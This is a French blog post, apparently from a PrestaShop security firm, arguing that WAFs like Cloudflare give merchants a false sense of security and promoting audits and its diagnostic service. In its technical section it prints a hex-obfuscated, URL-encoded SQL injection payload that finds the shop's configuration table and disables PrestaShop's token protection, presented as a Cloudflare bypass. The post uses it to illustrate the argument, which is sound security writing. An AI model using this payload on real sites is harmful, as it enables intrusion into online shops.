Le sentiment de sécurité : le véritable ennemi de la cybersécurité

Dans le domaine de la cybersécurité applicative qui vise à éviter d'avoir un PrestaShop piraté, il existe une grande disparité entre le sentiment de sécurité procuré par certaines solutions et la protection réelle qu'elles offrent.

Trop souvent, les entreprises se reposent sur des dispositifs réputés – tels que les Web Application Firewall (WAF - parefeu applicatif) – en pensant que leur simple présence suffit à bloquer les attaques. Or, ce sentiment de sécurité peut s'avérer être l'ennemi de la vraie protection.


Saviez-vous que Cloudflare peut aggraver vos risques de piratage ?


🚫 Le mythe du WAF tout-puissant



Les WAF sont fréquemment perçus comme la première ligne de défense pour protéger PrestaShop et Magento contre des attaques telles que les injections SQL, le Cross-Site Scripting (XSS) ou encore les tentatives d'exploitation de vulnérabilités connues.

Ce sentiment rassurant peut amener les équipes à se reposer sur ces dispositifs et à négliger d'autres aspects essentiels de la protection, notamment :


Plusieurs facteurs limitent l'efficacité des WAF :

  • 🔧 Mauvaise configuration et maintenance : Un WAF mal configuré, avec des règles inadaptées ou obsolètes, peut être facilement contourné par des attaquants avertis.
  • 🚀 Évolution rapide des menaces : Les cyberattaques évoluent constamment, et un WAF statique ne peut pas toujours s'adapter en temps réel aux nouvelles techniques d'exploitation.
  • 🤖 Automatisation limitée : Un WAF purement automatisé restera toujours une passoire, car il ne peut pas travailler avec des règles nécessitant des ajustements spécifiques. Chaque projet comporte des cas particuliers qui exigent une personnalisation fine des règles de protection.
  • 🕵️‍♂ Inutilité contre les 0day (attaque non connue) : Les WAF ne respectant pas l'état de l'Art sont souvent inefficaces contre les vulnérabilités 0day – des failles non connues – même lorsque la classe de vulnérabilité est parfaitement identifiée.
  • ❌ Fausse confiance : Installer un WAF peut donner l'illusion d'une protection complète, alors que certains vecteurs d'attaques, comme les fuites de données, restent hors de son périmètre de défense.


Exemple : Cloudflare 💡



Offre gratuite :

Cloudflare ne vous protège pas ou très mal des piratages qui visent directement PrestaShop sur son offre gratuite. Il vous protège majoritairement contre les saturations de service (DDoS) et les robots malveillants.

S'il n'y a aucun débat sur le fait que c'est l'un des meilleurs anti-DDoS de la planète compte tenu de ses capacités. Depuis 2023, ce type d'attaque n'est plus considéré comme la menace la plus dangereuse pour votre projet.


💰 Offre payante :

Même avec l'offre payante, il faut investir plusieurs centaines d'heures pour que la solution soit réellement efficace contre les menaces professionnelles, en particulier pour les marchands générant plus d'un million d'euros de chiffre d'affaires annuel (souvent marchand de niveau 3 au regard de la PCI DSS).


🔒 Limitations :

Sans personnalisation, Cloudflare ne protège pas nativement contre les fuites de données (nom de code CWE 200 et CWE 359), qui restent hors de son périmètre. La protection se limite principalement à la défense contre les malwares, et uniquement si les niveaux de sécurité les plus avancés sont activés.



Pour les plus techniques d'entre vous 🖥️



Voici un exemple d'attaque en variante hexadécimale, mal gérée par Cloudflare. Cet exemple permet d'exploiter une vulnérabilité de type INJECTION SQL et d'auto-déterminer le préfixe aléatoire de la base de données afin de maximiser l'impact sur le système : 


SET%20%40a%20%3D%20uNHEx%28534554204063203d20434f4E434154282755504441544520272c202853454C45435420434F4E434154282873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D4954202031292C2027636F6E66696775726174696F6E2729292C2027205345542076616C75653D30205748455245206E616D653D2250535F544F4B454E5F454E41424C45222729%29%3B%20PREPARE%20stmt%20FROM%20%40a%3B%20exECUTe%20stmt%3B%20PrEPare%20stmt2%20FroM%20%40c%3B%20exECUTe%20stmt2%3B

Merci aux sociétés Ambris Informatique et Softizy pour la coconstruction de cette charge s'inscrivant dans la CWE 89

Cet exemple illustre que, lorsqu'ils sont déployés de manière purement automatisée et sans personnalisation approfondie, les WAF restent vulnérables. Ils ne peuvent pas gérer les règles nécessitant des ajustements spécifiques pour chaque projet, se transformant ainsi en véritables passoires pour des pirates professionnels.

✅ Cela démontre l'importance de combiner des solutions automatisées avec une surveillance humaine et des ajustements personnalisés pour garantir une vraie sécurité.


Pourquoi Cloudflare peut aggraver vos risques en matière de piratage PrestaShop ?


Cloudflare agit comme un intermédiaire entre un pirate et votre PrestaShop.

Lorsqu'un pirate attaque votre PrestaShop, la connexion est établie depuis Cloudflare – vous ne voyez donc pas directement l'adresse de l'attaquant, mais uniquement celle de Cloudflare.

Cloudflare vous fournit l'adresse du pirate via des en-têtes HTTP (headers), dont l'exploitation professionnelle nécessite des compétences avancées.

Le pirate sait que vous ne pouvez pas expulser Cloudflare "simplement" si vous ne respectez pas leur préconisation, et il en profite. Expulser Cloudflare signifierait un arrêt complet de l'ensemble de votre trafic, y compris celui des visiteurs légitimes.

Même si une solution via API existe pour demander à Cloudflare de bannir l'attaquant, son utilisation n'est ni obligatoire ni systématique.

Par conséquent, en l'absence d'un mécanisme efficace permettant de bloquer l'attaquant via l'API de Cloudflare, ce dernier peut exploiter cette faille pour inonder le service de milliers de requêtes malveillantes, compromettant ainsi complètement la sécurité du PrestaShop ciblé.


🔐 La vraie sécurité : une approche multi-couches



Pour transformer le sentiment de sécurité en une protection réellement efficace, il est essentiel d'adopter une stratégie multi-couches :

  • 📝 Audit et tests réguliers : La réalisation d'audits de sécurité et de tests de pénétration permet d'identifier les failles, même dans des dispositifs réputés sécurisés.
  • 👀 Surveillance continue et intelligence des menaces : L'utilisation d'outils de monitoring en temps réel et de systèmes d'intelligence permet de détecter rapidement toute activité suspecte et de réagir efficacement.
  • 🔄 Mise à jour et adaptation : Les solutions de sécurité doivent être mises à jour régulièrement pour s'adapter à l'évolution rapide des menaces, avec des ajustements constants des règles de protection.
  • 🎓 Formation et sensibilisation : Former et sensibiliser l'ensemble des collaborateurs aux bonnes pratiques de sécurité permet de réduire les risques liés aux erreurs humaines et aux mauvaises configurations.

Conclusion

Si l'installation d'un WAF ou l'abonnement à une solution comme Cloudflare peut contribuer à créer un sentiment de sécurité, ces dispositifs ne garantissent pas, sans effort et personnalisation, une protection complète contre les cyberattaques.

La vraie sécurité repose sur une approche intégrée, multi-couches et évolutive, combinant audits réguliers, surveillance active, mises à jour constantes et formation continue.

Seule une stratégie globale permet de transformer un sentiment de sécurité en une protection solide et durable face aux menaces actuelles.

Nous vous encourageons à réaliser un diagnostic de votre WAF - notre diagnostiqueur peut vous aider.




Souhaitez-vous en discuter avec nous ? 02 42 00 00 24